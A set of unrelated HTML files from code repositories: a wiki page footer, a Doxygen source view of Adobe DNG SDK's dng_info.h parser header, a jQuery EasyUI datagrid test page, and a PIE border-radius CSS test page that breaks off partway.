href="index.php/Configuration_tips.html">Customization tips</a></li> <li id="n-OAR.27s-News"><a href="http://oar.imag.fr/news/">OAR's News</a></li> </ul> </div> </div> <div class='generated-sidebar portlet' id='p-Summer_of_Code'> <h5>Summer of Code</h5> <div class='pBody'> <ul> <li id="n-GSoC-Summary"><a href="index.php/Google_summer_of_code.html">GSoC Summary</a></li> <li id="n-2010-edition"><a href="index.php/GSOC_2010.html">2010 edition</a></li> <li id="n-2009-edition"><a href="index.php/GSOC_2009.html">2009 edition</a></li> <li id="n-2008-edition"><a href="http://oar.imag.fr/works/gsoc/2008/">2008 edition</a></li> </ul> </div> </div> <div class='generated-sidebar portlet' id='p-Related_links'> <h5>Related links</h5> <div class='pBody'> <ul> <li id="n-Summary"><a href="index.php/Links.html">Summary:</a></li> <li id="n-About-OAR-.28French.29"><a href="http://www.projet-plume.org/fr/fiche/oar">About OAR (French)</a></li> <li id="n-TakTuk"><a href="http://taktuk.gforge.inria.fr/">TakTuk</a></li> <li id="n-CiGri"><a href="http://cigri.imag.fr/">CiGri</a></li> <li id="n-Kameleon"><a href="index.php/Kameleon.html">Kameleon</a></li> <li id="n-ComputeMode"><a href="http://computemode.imag.fr/">ComputeMode</a></li> <li id="n-Xionee"><a href="https://gforge.inria.fr/projects/xionee/">Xionee</a></li> <li id="n-KaDeploy"><a href="http://kadeploy.imag.fr/">KaDeploy</a></li> </ul> </div> </div> <div class='generated-sidebar portlet' id='p-Developers_portal'> <h5>Developers portal</h5> <div class='pBody'> <ul> <li id="n-Summary"><a href="index.php/Developers_Pages.html">Summary:</a></li> <li id="n-Meetings-reports"><a href="index.php/Category:Portal:Staff:MeetingReports.html">Meetings reports</a></li> <li id="n-Assigned-TaskList"><a href="index.php/Special:TaskList/all.html">Assigned TaskList</a></li> <li id="n-Todo-Page"><a href="index.php/TODO.html">Todo Page</a></li> <li id="n-Tools-and-Tips"><a href="index.php/Devel_Tools_tips.html">Tools and Tips</a></li> <li id="n-FAQ"><a href="index.php/FAQ.html">FAQ</a></li> </ul> </div> </div> <div id="p-search" class="portlet"> <h5><label for="searchInput">Search</label></h5> <div id="searchBody" class="pBody"> <form action="http://oar.imag.fr/archive/wiki-oar/index.php" id="searchform"><div> <input type='hidden' name="title" value="Special:Search"/> <input id="searchInput" name="search" type="text" title="Search WikiOAR [f]" accesskey="f" value="" /> <input type='submit' name="go" class="searchButton" id="searchGoButton" value="Go" title="Go to a page with this exact name if exists" />&nbsp; <input type='submit' name="fulltext" class="searchButton" id="mw-searchButton" value="Search" title="Search the pages for this text" /> </div></form> </div> </div> <div class="portlet" id="p-tb"> <h5>Toolbox</h5> <div class="pBody"> <ul> <li id="t-whatlinkshere"><a href="index.php/Special:WhatLinksHere/GForge_and_git_usage.html" title="List of all wiki pages that link here [j]" accesskey="j">What links here</a></li> <li id="t-recentchangeslinked"><a href="index.php/Special:RecentChangesLinked/GForge_and_git_usage.html" title="Recent changes in pages linked from this page [k]" accesskey="k">Related changes</a></li> <li id="t-specialpages"><a href="index.php/Special:SpecialPages.html" title="List of all special pages [q]" accesskey="q">Special pages</a></li> <li id="t-print"><a href="index.php%3Ftitle=GForge_and_git_usage&amp;printable=yes&amp;printable=yes.html" rel="alternate" title="Printable version of this page [p]" accesskey="p">Printable version</a></li> <li id="t-permalink"><a href="index.php%3Ftitle=GForge_and_git_usage&amp;oldid=3438.html" title="Permanent link to this revision of the page">Permanent link</a></li> </ul> </div> </div> </div><!-- end of the left (by default at least) column --> <div class="visualClear"></div> <div id="footer"> <div id="f-poweredbyico"><a href="http://www.mediawiki.org/"><img src="skins/common/images/poweredby_mediawiki_88x31.png" alt="Powered by MediaWiki" /></a></div> <ul id="f-list"> <li id="lastmod"> This page was last modified on 19 May 2011, at 13:46.</li> <li id="viewcount">This page has been accessed 1,714 times.</li> <li id="about"><a href="index.php/WikiOAR:About.html" title="WikiOAR:About">About WikiOAR and OAR logo</a></li> </ul> </div> </div> <script type="text/javascript">if (window.runOnloadHook) runOnloadHook();</script> <!-- Served in 0.048 secs. --></body></html>
dng_sdk/documents/doxygen/output/html/dng__info_8h_source.html
yanburman/sjcam_raw2dng
<!-- Copyright 2005-2009 Adobe Systems Incorporated Distributed under the MIT License (see accompanying file LICENSE_1_0_0.txt or a copy at http://stlab.adobe.com/licenses.html) Some files are held under additional license. Please see "http://stlab.adobe.com/licenses.html" for more information. --> <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en"> <head> <TITLE>DNG SDK 1.3: dng_info.h Source File</TITLE> <META HTTP-EQUIV="content-type" CONTENT="text/html;charset=ISO-8859-1"/> <LINK TYPE="text/css" REL="stylesheet" HREF="adobe_source.css"/> <LINK REL="alternate" TITLE="stlab.adobe.com RSS" HREF="http://sourceforge.net/export/rss2_projnews.php?group_id=132417&amp;rss_fulltext=1" TYPE="application/rss+xml"/> <script src="http://www.google-analytics.com/urchin.js" type="text/javascript"></script> </head> <body> <div id='content'> <table><tr> <td colspan='5'> <div id='opensource_banner'> <table style='width: 100%; padding: 5px;'><tr> <td> <span style='font-size: 30px'><a href='index.html' style='color: black; border: none'>stlab.adobe.com</a></span> </td> <td align='right'> <a href='http://www.adobe.com' style='border: none'><img src='adobe_hlogo.gif' alt="Adobe Systems Incorporated"/></a> </td> </tr></table> </div> </td></tr><tr> <td valign="top"> <div id='navtable' height='100%'> <div style='margin: 5px'> <h4>Documentation</h4> <a href="group__asl__overview.html">Overview</a><br/> <a href="asl_readme.html">Building ASL</a><br/> <a href="asl_toc.html">Documentation</a><br/> <a href="http://stlab.adobe.com/wiki/index.php/Supplementary_ASL_Documentation">Library Wiki Docs</a><br/> <a href="asl_indices.html">Indices</a><br/> <a href="http://stlab.adobe.com/perforce/">Browse Perforce</a><br/> <h4>More Info</h4> <a href="asl_release_notes.html">Release Notes</a><br/> <a href="http://stlab.adobe.com/wiki/">Wiki</a><br/> <a href="asl_search.html">Site Search</a><br/> <a href="licenses.html">License</a><br/> <a href="success_stories.html">Success Stories</a><br/> <a href="asl_contributors.html">Contributors</a><br/> <h4>Media</h4> <a href="http://sourceforge.net/project/showfiles.php?group_id=132417&amp;package_id=145420">Download</a><br/> <a href="asl_download_perforce.html">Perforce Depots</a><br/> <h4>Support</h4> <a href="http://sourceforge.net/projects/adobe-source/">ASL SourceForge Home</a><br/> <a href="http://sourceforge.net/mail/?group_id=132417">Mailing Lists</a><br/> <a href="http://sourceforge.net/forum/?group_id=132417">Discussion Forums</a><br/> <a href="http://sourceforge.net/tracker/?atid=724218&amp;group_id=132417&amp;func=browse">Report Bugs</a><br/> <a href="http://sourceforge.net/tracker/?atid=724221&amp;group_id=132417&amp;func=browse">Suggest Features</a><br/> <a href="asl_contributing.html">Contribute to ASL</a><br/> <h4>RSS</h4> <a href="http://sourceforge.net/export/rss2_projnews.php?group_id=132417">Short-text news</a><br/> <a href="http://sourceforge.net/export/rss2_projnews.php?group_id=132417&amp;rss_fulltext=1">Full-text news</a><br/> <a href="http://sourceforge.net/export/rss2_projfiles.php?group_id=132417">File releases</a><br/> <h4>Other Adobe Projects</h4> <a href="adobe_apollo.html">Adobe Air</a><br/> <a href="http://stlab.adobe.com/gil/">Adobe GIL</a><br/> <a href="http://labs.adobe.com">Adobe Labs</a><br/> <a href="http://stlab.adobe.com/amg/">Adobe Media Gallery</a><br/> <a href="http://www.adobe.com/products/xmp/">Adobe XMP</a><br/> <a href="http://www.mozilla.org/projects/tamarin">Tamarin project<br/>(Mozilla Foundation)</a><br/> <h4>Other Resources</h4> <a href="http://boost.org">Boost</a><br/> <a href="http://www.riaforge.com/">RIAForge</a><br/> <a href="http://www.sgi.com/tech/stl">SGI STL</a><br/> </div> </div> </td> <td id='maintable' width="100%" valign="top"> <!-- End Header --> <!-- Generated by Doxygen 1.5.9 --> <div class="navigation" id="top"> <div class="tabs"> <ul> <li><a href="index.html"><span>Main&nbsp;Page</span></a></li> <li><a href="pages.html"><span>Related&nbsp;Pages</span></a></li> <li><a href="annotated.html"><span>Classes</span></a></li> <li class="current"><a href="files.html"><span>Files</span></a></li> </ul> </div> <div class="tabs"> <ul> <li><a href="files.html"><span>File&nbsp;List</span></a></li> <li><a href="globals.html"><span>File&nbsp;Members</span></a></li> </ul> </div> <h1>dng_info.h</h1><a href="dng__info_8h.html">Go to the documentation of this file.</a><div class="fragment"><pre class="fragment"><a name="l00001"></a>00001 <span class="comment">/*****************************************************************************/</span> <a name="l00002"></a>00002 <span class="comment">// Copyright 2006-2007 Adobe Systems Incorporated</span> <a name="l00003"></a>00003 <span class="comment">// All Rights Reserved.</span> <a name="l00004"></a>00004 <span class="comment">//</span> <a name="l00005"></a>00005 <span class="comment">// NOTICE: Adobe permits you to use, modify, and distribute this file in</span> <a name="l00006"></a>00006 <span class="comment">// accordance with the terms of the Adobe license agreement accompanying it.</span> <a name="l00007"></a>00007 <span class="comment">/*****************************************************************************/</span> <a name="l00008"></a>00008 <a name="l00009"></a>00009 <span class="comment">/* $Id: //mondo/workarea/stern/camera_raw/dng_sdk/source/dng_info.h#8 $ */</span> <a name="l00010"></a>00010 <span class="comment">/* $DateTime: 2007/12/10 20:35:54 $ */</span> <a name="l00011"></a>00011 <span class="comment">/* $Change: 404775 $ */</span> <a name="l00012"></a>00012 <span class="comment">/* $Author: stern $ */</span> <a name="l00013"></a>00013 <a name="l00018"></a>00018 <span class="comment">/*****************************************************************************/</span> <a name="l00019"></a>00019 <a name="l00020"></a>00020 <span class="preprocessor">#ifndef __dng_info__</span> <a name="l00021"></a>00021 <span class="preprocessor"></span><span class="preprocessor">#define __dng_info__</span> <a name="l00022"></a>00022 <span class="preprocessor"></span> <a name="l00023"></a>00023 <span class="comment">/*****************************************************************************/</span> <a name="l00024"></a>00024 <a name="l00025"></a>00025 <span class="preprocessor">#include "dng_classes.h"</span> <a name="l00026"></a>00026 <span class="preprocessor">#include "<a class="code" href="dng__ifd_8h.html">dng_ifd.h</a>"</span> <a name="l00027"></a>00027 <span class="preprocessor">#include "<a class="code" href="dng__exif_8h.html">dng_exif.h</a>"</span> <a name="l00028"></a>00028 <span class="preprocessor">#include "dng_shared.h"</span> <a name="l00029"></a>00029 <span class="preprocessor">#include "<a class="code" href="dng__errors_8h.html">dng_errors.h</a>"</span> <a name="l00030"></a>00030 <span class="preprocessor">#include "<a class="code" href="dng__sdk__limits_8h.html">dng_sdk_limits.h</a>"</span> <a name="l00031"></a>00031 <span class="preprocessor">#include "<a class="code" href="dng__auto__ptr_8h.html">dng_auto_ptr.h</a>"</span> <a name="l00032"></a>00032 <a name="l00033"></a>00033 <span class="comment">/*****************************************************************************/</span> <a name="l00034"></a>00034 <a name="l00038"></a>00038 <a name="l00039"></a><a class="code" href="classdng__info.html">00039</a> <span class="keyword">class </span><a class="code" href="classdng__info.html" title="Top-level structure of DNG file with access to metadata.">dng_info</a> <a name="l00040"></a>00040 { <a name="l00041"></a>00041 <a name="l00042"></a>00042 <span class="keyword">public</span>: <a name="l00043"></a>00043 <a name="l00044"></a>00044 uint64 fTIFFBlockOffset; <a name="l00045"></a>00045 <a name="l00046"></a>00046 uint64 fTIFFBlockOriginalOffset; <a name="l00047"></a>00047 <a name="l00048"></a>00048 <span class="keywordtype">bool</span> fBigEndian; <a name="l00049"></a>00049 <a name="l00050"></a>00050 uint32 fMagic; <a name="l00051"></a>00051 <a name="l00052"></a>00052 <a class="code" href="class_auto_ptr.html">AutoPtr&lt;dng_exif&gt;</a> fExif; <a name="l00053"></a>00053 <a name="l00054"></a>00054 <a class="code" href="class_auto_ptr.html">AutoPtr&lt;dng_shared&gt;</a> fShared; <a name="l00055"></a>00055 <a name="l00056"></a>00056 int32 fMainIndex; <a name="l00057"></a>00057 <a name="l00058"></a>00058 uint32 fIFDCount; <a name="l00059"></a>00059 <a name="l00060"></a>00060 <a class="code" href="class_auto_ptr.html">AutoPtr&lt;dng_ifd&gt;</a> fIFD [<a class="code" href="dng__sdk__limits_8h.html#4ce8e3d5c147928ef34ffd3643fb19b4" title="The maximum number of SubIFDs that will be parsed.">kMaxSubIFDs</a> + 1]; <a name="l00061"></a>00061 <a name="l00062"></a>00062 uint32 fChainedIFDCount; <a name="l00063"></a>00063 <a name="l00064"></a>00064 <a class="code" href="class_auto_ptr.html">AutoPtr&lt;dng_ifd&gt;</a> fChainedIFD [<a class="code" href="dng__sdk__limits_8h.html#13133643de1281327febde80f6c00efc" title="The maximum number of chained IFDs that will be parsed.">kMaxChainedIFDs</a>]; <a name="l00065"></a>00065 <a name="l00066"></a>00066 <span class="keyword">protected</span>: <a name="l00067"></a>00067 <a name="l00068"></a>00068 uint32 fMakerNoteNextIFD; <a name="l00069"></a>00069 <a name="l00070"></a>00070 <span class="keyword">public</span>: <a name="l00071"></a>00071 <a name="l00072"></a>00072 <a class="code" href="classdng__info.html" title="Top-level structure of DNG file with access to metadata.">dng_info</a> (); <a name="l00073"></a>00073 <a name="l00074"></a>00074 <span class="keyword">virtual</span> ~<a class="code" href="classdng__info.html" title="Top-level structure of DNG file with access to metadata.">dng_info</a> (); <a name="l00075"></a>00075 <a name="l00079"></a>00079 <a name="l00080"></a>00080 <span class="keyword">virtual</span> <span class="keywordtype">void</span> <a class="code" href="classdng__info.html#2577c27e3468165989112ba243432190">Parse</a> (<a class="code" href="classdng__host.html" title="The main class for communication between the application and the DNG SDK. Used to...">dng_host</a> &amp;host, <a name="l00081"></a>00081 <a class="code" href="classdng__stream.html">dng_stream</a> &amp;stream); <a name="l00082"></a>00082 <a name="l00084"></a>00084 <a name="l00085"></a>00085 <span class="keyword">virtual</span> <span class="keywordtype">void</span> <a class="code" href="classdng__info.html#872b131e400bfa3f49c4ae7e60d03f24" title="Must be called immediately after a successful Parse operation.">PostParse</a> (<a class="code" href="classdng__host.html" title="The main class for communication between the application and the DNG SDK. Used to...">dng_host</a> &amp;host); <a name="l00086"></a>00086 <a name="l00089"></a>00089 <a name="l00090"></a>00090 <span class="keyword">virtual</span> <span class="keywordtype">bool</span> <a class="code" href="classdng__info.html#151cd8d36dc0e9cb42a6beff61404573">IsValidDNG</a> (); <a name="l00091"></a>00091 <a name="l00092"></a>00092 <span class="keyword">protected</span>: <a name="l00093"></a>00093 <a name="l00094"></a>00094 <span class="keyword">virtual</span> <span class="keywordtype">void</span> ValidateMagic (); <a name="l00095"></a>00095 <a name="l00096"></a>00096 <span class="keyword">virtual</span> <span class="keywordtype">void</span> ParseTag (<a class="code" href="classdng__host.html" title="The main class for communication between the application and the DNG SDK. Used to...">dng_host</a> &amp;host, <a name="l00097"></a>00097 <a class="code" href="classdng__stream.html">dng_stream</a> &amp;stream, <a name="l00098"></a>00098 <a class="code" href="classdng__exif.html" title="Container class for parsing and holding EXIF tags.">dng_exif</a> *exif, <a name="l00099"></a>00099 dng_shared *shared, <a name="l00100"></a>00100 <a class="code" href="classdng__ifd.html" title="Container for a single image file directory of a digital negative.">dng_ifd</a> *ifd, <a name="l00101"></a>00101 uint32 parentCode, <a name="l00102"></a>00102 uint32 tagCode, <a name="l00103"></a>00103 uint32 tagType, <a name="l00104"></a>00104 uint32 tagCount, <a name="l00105"></a>00105 uint64 tagOffset, <a name="l00106"></a>00106 int64 offsetDelta); <a name="l00107"></a>00107 <a name="l00108"></a>00108 <span class="keyword">virtual</span> <span class="keywordtype">bool</span> ValidateIFD (<a class="code" href="classdng__stream.html">dng_stream</a> &amp;stream, <a name="l00109"></a>00109 uint64 ifdOffset, <a name="l00110"></a>00110 int64 offsetDelta); <a name="l00111"></a>00111 <a name="l00112"></a>00112 <span class="keyword">virtual</span> <span class="keywordtype">void</span> ParseIFD (<a class="code" href="classdng__host.html" title="The main class for communication between the application and the DNG SDK. Used to...">dng_host</a> &amp;host, <a name="l00113"></a>00113 <a class="code" href="classdng__stream.html">dng_stream</a> &amp;stream, <a name="l00114"></a>00114 <a class="code" href="classdng__exif.html" title="Container class for parsing and holding EXIF tags.">dng_exif</a> *exif, <a name="l00115"></a>00115 dng_shared *shared, <a name="l00116"></a>00116 <a class="code" href="classdng__ifd.html" title="Container for a single image file directory of a digital negative.">dng_ifd</a> *ifd, <a name="l00117"></a>00117 uint64 ifdOffset, <a name="l00118"></a>00118 int64 offsetDelta, <a name="l00119"></a>00119 uint32 parentCode); <a name="l00120"></a>00120 <a name="l00121"></a>00121 <span class="keyword">virtual</span> <span class="keywordtype">bool</span> ParseMakerNoteIFD (<a class="code" href="classdng__host.html" title="The main class for communication between the application and the DNG SDK. Used to...">dng_host</a> &amp;host, <a name="l00122"></a>00122 <a class="code" href="classdng__stream.html">dng_stream</a> &amp;stream, <a name="l00123"></a>00123 uint64 ifdSize, <a name="l00124"></a>00124 uint64 ifdOffset, <a name="l00125"></a>00125 int64 offsetDelta, <a name="l00126"></a>00126 uint64 minOffset, <a name="l00127"></a>00127 uint64 maxOffset, <a name="l00128"></a>00128 uint32 parentCode); <a name="l00129"></a>00129 <a name="l00130"></a>00130 <span class="keyword">virtual</span> <span class="keywordtype">void</span> ParseMakerNote (<a class="code" href="classdng__host.html" title="The main class for communication between the application and the DNG SDK. Used to...">dng_host</a> &amp;host, <a name="l00131"></a>00131 <a class="code" href="classdng__stream.html">dng_stream</a> &amp;stream, <a name="l00132"></a>00132 uint32 makerNoteCount, <a name="l00133"></a>00133 uint64 makerNoteOffset, <a name="l00134"></a>00134 int64 offsetDelta, <a name="l00135"></a>00135 uint64 minOffset, <a name="l00136"></a>00136 uint64 maxOffset); <a name="l00137"></a>00137 <a name="l00138"></a>00138 <span class="keyword">virtual</span> <span class="keywordtype">void</span> ParseSonyPrivateData (<a class="code" href="classdng__host.html" title="The main class for communication between the application and the DNG SDK. Used to...">dng_host</a> &amp;host, <a name="l00139"></a>00139 <a class="code" href="classdng__stream.html">dng_stream</a> &amp;stream, <a name="l00140"></a>00140 uint32 count, <a name="l00141"></a>00141 uint64 oldOffset, <a name="l00142"></a>00142 uint64 newOffset); <a name="l00143"></a>00143 <a name="l00144"></a>00144 <span class="keyword">virtual</span> <span class="keywordtype">void</span> ParseDNGPrivateData (<a class="code" href="classdng__host.html" title="The main class for communication between the application and the DNG SDK. Used to...">dng_host</a> &amp;host, <a name="l00145"></a>00145 <a class="code" href="classdng__stream.html">dng_stream</a> &amp;stream); <a name="l00146"></a>00146 <a name="l00147"></a>00147 <span class="keyword">private</span>: <a name="l00148"></a>00148 <a name="l00149"></a>00149 <span class="comment">// Hidden copy constructor and assignment operator.</span> <a name="l00150"></a>00150 <a name="l00151"></a>00151 <a class="code" href="classdng__info.html" title="Top-level structure of DNG file with access to metadata.">dng_info</a> (<span class="keyword">const</span> <a class="code" href="classdng__info.html" title="Top-level structure of DNG file with access to metadata.">dng_info</a> &amp;info); <a name="l00152"></a>00152 <a name="l00153"></a>00153 <a class="code" href="classdng__info.html" title="Top-level structure of DNG file with access to metadata.">dng_info</a> &amp; operator= (<span class="keyword">const</span> <a class="code" href="classdng__info.html" title="Top-level structure of DNG file with access to metadata.">dng_info</a> &amp;info); <a name="l00154"></a>00154 <a name="l00155"></a>00155 }; <a name="l00156"></a>00156 <a name="l00157"></a>00157 <span class="comment">/*****************************************************************************/</span> <a name="l00158"></a>00158 <a name="l00159"></a>00159 <span class="preprocessor">#endif</span> <a name="l00160"></a>00160 <span class="preprocessor"></span> <a name="l00161"></a>00161 <span class="comment">/*****************************************************************************/</span> </pre></div></div> <!-- Begin Footer --> </td></tr> </table> </div> <!-- content --> <div class='footerdiv'> <div id='footersub'> <ul> <li><a href="http://www.adobe.com/go/gftray_foot_aboutadobe">Company</a>&nbsp;|&nbsp;</li> <li><a href="http://www.adobe.com/go/gftray_foot_privacy_security">Online Privacy Policy</a>&nbsp;|&nbsp;</li> <li><a href="http://www.adobe.com/go/gftray_foot_terms">Terms of Use</a>&nbsp;|&nbsp;</li> <li><a href="http://www.adobe.com/go/gftray_foot_contact_adobe">Contact Us</a>&nbsp;|&nbsp;</li> <li><a href="http://www.adobe.com/go/gftray_foot_accessibility">Accessibility</a>&nbsp;|&nbsp;</li> <li><a href="http://www.adobe.com/go/gftray_foot_report_piracy">Report Piracy</a>&nbsp;|&nbsp;</li> <li><a href="http://www.adobe.com/go/gftray_foot_permissions_trademarks">Permissions &amp; Trademarks</a>&nbsp;|&nbsp;</li> <li><a href="http://www.adobe.com/go/gftray_foot_product_license_agreements">Product License Agreements</a>&nbsp;|&nbsp;</li> <li><a href="http://www.adobe.com/go/gftray_foot_feedback">Send Feedback</a></li> </ul> <div> <p>Copyright &#169; 2006-2009 Adobe Systems Incorporated.</p> <p>Use of this website signifies your agreement to the <a href="http://www.adobe.com/go/gftray_foot_terms">Terms of Use</a> and <a href="http://www.adobe.com/go/gftray_foot_privacy_security">Online Privacy Policy</a>.</p> <p>Search powered by <a href="http://www.google.com/" target="new">Google</a></p> </div> </div> </div> <script type="text/javascript"> _uacct = "UA-396569-1"; urchinTracker(); </script> </body> </html>
agility/tests/datagrid_test.html
nedy13/AgilityContest
<!DOCTYPE html> <html> <head> <meta charset="UTF-8"> <title>Basic DataGrid - jQuery EasyUI Demo</title> <link rel="stylesheet" type="text/css" href="../lib/jquery-easyui-1.4.2/themes/default/easyui.css"> <link rel="stylesheet" type="text/css" href="../lib/jquery-easyui-1.4.2/themes/icon.css"> <link rel="stylesheet" type="text/css" href="../lib/jquery-easyui-1.4.2/demo/demo.css"> <script type="text/javascript" src="../lib/jquery-1.12.3.min.js"></script> <script type="text/javascript" src="../lib/jquery-easyui-1.4.2/jquery.easyui.min.js"></script> <script type="text/javascript"> /* (function($){ function fitColumns(target){ var state = $.data(target, 'datagrid'); var opts = state.options; var dc = state.dc; var header = dc.view2.children('div.datagrid-header'); dc.body2.css('overflow-x', ''); var rownumberWidth = opts.rownumbers ? dc.header1.find('.datagrid-header-rownumber').parent().outerWidth() : 0; setGroupWidth(); setPercentWidth(); fillWidth(); setGroupWidth(true); if (header.width() >= header.find('table').width()){ dc.body2.css('overflow-x', 'hidden'); } function fillWidth(){ if (!opts.fitColumns){return;} if (!state.leftWidth){state.leftWidth = 0;} var fieldWidths = 0; var cc = []; var fields = $(target).datagrid('getColumnFields', false); for(var i=0; i<fields.length; i++){ var col = $(target).datagrid('getColumnOption', fields[i]); if (canResize(col)){ fieldWidths += col.width; cc.push({field:col.field, col:col, addingWidth:0}); } } if (!fieldWidths){return;} cc[cc.length-1].addingWidth -= state.leftWidth; var headerInner = header.children('div.datagrid-header-inner').show(); var leftWidth = header.width() - header.find('table').width() - opts.scrollbarSize + state.leftWidth; var rate = leftWidth / fieldWidths; if (!opts.showHeader){headerInner.hide();} for(var i=0; i<cc.length; i++){ var c = cc[i]; var width = parseInt(c.col.width * rate); c.addingWidth += width; leftWidth -= width; } cc[cc.length-1].addingWidth += leftWidth; for(var i=0; i<cc.length; i++){ var c = cc[i]; if (c.col.boxWidth + c.addingWidth > 0){ c.col.boxWidth += c.addingWidth; c.col.width += c.addingWidth; } } state.leftWidth = leftWidth; // fixColumnSize(target); $(target).datagrid('fixColumnSize'); } function setPercentWidth(){ var changed = false; var fields = $(target).datagrid('getColumnFields',true).concat($(target).datagrid('getColumnFields',false)); $.map(fields, function(field){ var col = $(target).datagrid('getColumnOption', field); if (String(col.width||'').indexOf('%') >= 0){ var width = $.parser.parseValue('width',col.width,dc.view,opts.scrollbarSize+rownumberWidth) - col.deltaWidth; if (width > 0){ col.boxWidth = width; changed = true; } } }); if (changed){ // fixColumnSize(target); $(target).datagrid('fixColumnSize'); } } function setGroupWidth(fit){ var groups = dc.header1.add(dc.header2).find('.datagrid-cell-group'); if (groups.length){ groups.each(function(){ $(this)._outerWidth(fit ? $(this).parent().width() : 10); }); if (fit){ setBodySize(target); } } } function canResize(col){ if (String(col.width||'').indexOf('%') >= 0){return false;} if (!col.hidden && !col.checkbox && !col.auto && !col.fixed){return true;} } } $.extend($.fn.datagrid.methods, { fitColumns: function(jq){ return jq.each(function(){ fitColumns(this); }); } }); })(jQuery); */ </script> </head> <body> <div id="myWindow" class="easyui-window" style="width: 600px; height: 200px" data-options="resizable:true"> <table id="dg" class="easyui-datagrid" data-options="singleSelect:false, url:'../lib/jquery-easyui-1.4.2/demo/layout/datagrid_data1.json', method:'get', fit:true, fitColumns:true, rownumbers:true"> <thead> <tr> <th data-options="field:'itemid',width:'10%'">Item ID</th> <th data-options="field:'productid',width:'15%'">Product</th> <th data-options="field:'listprice',width:'10%',align:'right'">List Price</th> <th data-options="field:'unitcost',width:'15%',align:'right'">Unit Cost</th> <th data-options="field:'attr1',width:'30%'">Attribute</th> <th data-options="field:'status',width:'20%',align:'center'">Status</th> </tr> </thead> </table> </div> </body> </html>
sites/all/libraries/PIE/tests/border-radius-tests.html
apecson/DSFOC
<!DOCTYPE html> <html> <head> <meta content="text/html; charset=UTF-8" http-equiv="content-type"> <title>Test cases for border-radius</title> <style type="text/css"> html { -pie-load-path: "../build"; } body { font-size: 12px; } #tests { padding: 2em; } #tests div { width: 50%; padding: 1.5em; margin: 1em 0; white-space: pre; behavior: url(../build/PIE.htc); position: relative; background: #CCF; } </style> </head> <body> <h1>Tests for border-radius</h1> <div id="tests"> <h2>Uniform</h2> <div>border-radius: 10px;</div> <div>border-radius: 1em;</div> <div>border-radius: 20%;</div> <h2>Different per corner</h2> <div>border-radius: 5px 10px 15px 20px;</div> <div>border-radius: 0.5em 1em 1.5em 2em;</div> <div>border-radius: 10% 20% 30% 40%;</div> <h2>Single corner</h2> <div>border-radius: 20px 0 0 0;</div> <div>border-radius: 0 20px 0 0;</div> <div>border-radius: 0 0 20px 0;</div> <div>border-radius: 0 0 0 20px;</div> <h2>X and Y</h2> <div>border-radius: 30px / 10px;</div> <div>border-radius: 3em / 1em;</div> <div>border-radius: 20% / 50%;</div> <div>border-radius: 5px 10px 15px 20px / 20px 15px 10px 5px;</div> <h2>Uniform with border</h2> <div>border-radius: 10px; border: 5px solid #000;</div> <div>border-radius: 10px; border: 5px dotted #000;</div> <div>border-radius: 10px; border: 5px dashed #000;</div> <div>border-radius: 10px; border: 5px double #000;</div> <div>border-radius: 10px; border: 5px groove #000;</div> <div>border-radius: 10px; border: 5px ridge #000;</div> <div>border-radius: 10px; border: 5px inset #000;</div> <div>border-radius: 10px; border: 5px outset #000;</div> <h2>Differing border widths</h2> <div>border-radius: 10px; border: solid #000; border-width: 6px 9px 6px 3px;</div> <div>border-radius: 10px; border: dotted #000; border-width: 6px 9px 6px 3px;</div> <div>border-radius: 10px; border: dashed #000; border-width: 6px 9px 6px 3px;</div> <div>border-radius: 10px; border: double #000; border-width: 6px 9px 6px 3px;</div> <div>border-radius: 10px; border: groove #000; border-width: 6px 9px 6px 3px;</div> <div>border-radius: 10px; border: ridge #000; border-width: 6px 9px 6px 3px;</div> <div>border-radius: 10px; border: inset #000; border-width: 6px 9px 6px 3px;</div> <div>border-radius: 10px; border: outset #000; border-width: 6px 9px 6px 3px;</div> <h2>Border thicker than radius</h2> <div>border-radius: 10px; border: 20px solid #000;</div> <div>border-radius: 10px; border: 20px dotted #000;</div> <div>border-radius: 10px; border: 20px dashed #000;</div> <div>border-radius: 10px; border: 20px double #000;</div> <div>border-radius: 10px; border: solid #000; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: dotted #000; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: dashed #000; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: double #000; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: groove #000; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: ridge #000; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: inset #000; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: outset #000; border-width: 3px 20px 9px 15px;</div> <h2>Zero-width borders</h2> <div>border-radius: 10px; border: 20px solid #000; border-top-width: 0;</div> <div>border-radius: 10px; border: 20px dotted #000; border-right-width: 0;</div> <div>border-radius: 10px; border: 20px dashed #000; border-bottom-width: 0;</div> <div>border-radius: 10px; border: 20px double #000; border-left-width: 0;</div> <div>border-radius: 10px; border: 20px groove #000; border-top-width: 0;</div> <div>border-radius: 10px; border: 20px ridge #000; border-right-width: 0;</div> <div>border-radius: 10px; border: 20px inset #000; border-bottom-width: 0;</div> <div>border-radius: 10px; border: 20px outset #000; border-left-width: 0;</div> <h2>Differing border colors</h2> <div>border-radius: 10px; border: 20px solid; border-color: red green blue orange;</div> <div>border-radius: 10px; border: 20px dotted; border-color: red green blue orange;</div> <div>border-radius: 10px; border: 20px dashed; border-color: red green blue orange;</div> <div>border-radius: 10px; border: 20px double; border-color: red green blue orange;</div> <div>border-radius: 10px; border: 20px groove; border-color: red green blue orange;</div> <div>border-radius: 10px; border: 20px ridge; border-color: red green blue orange;</div> <div>border-radius: 10px; border: 20px inset; border-color: red green blue orange;</div> <div>border-radius: 10px; border: 20px outset; border-color: red green blue orange;</div> <h2>Differing border colors and styles</h2> <div>border-radius: 10px; border: 20px; border-color: red green blue orange; border-style: solid dotted dashed double;</div> <div>border-radius: 10px; border: 20px; border-color: red green blue orange; border-style: groove ridge inset outset;</div> <h2>Differing border colors and widths</h2> <div>border-radius: 10px; border: solid; border-color: red green blue orange; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: dotted; border-color: red green blue orange; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: dashed; border-color: red green blue orange; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: double; border-color: red green blue orange; border-width: 3px 20px 9px 15px;</div> <div>border-radius: 10px; border: groove; border-color: red green blue orange; 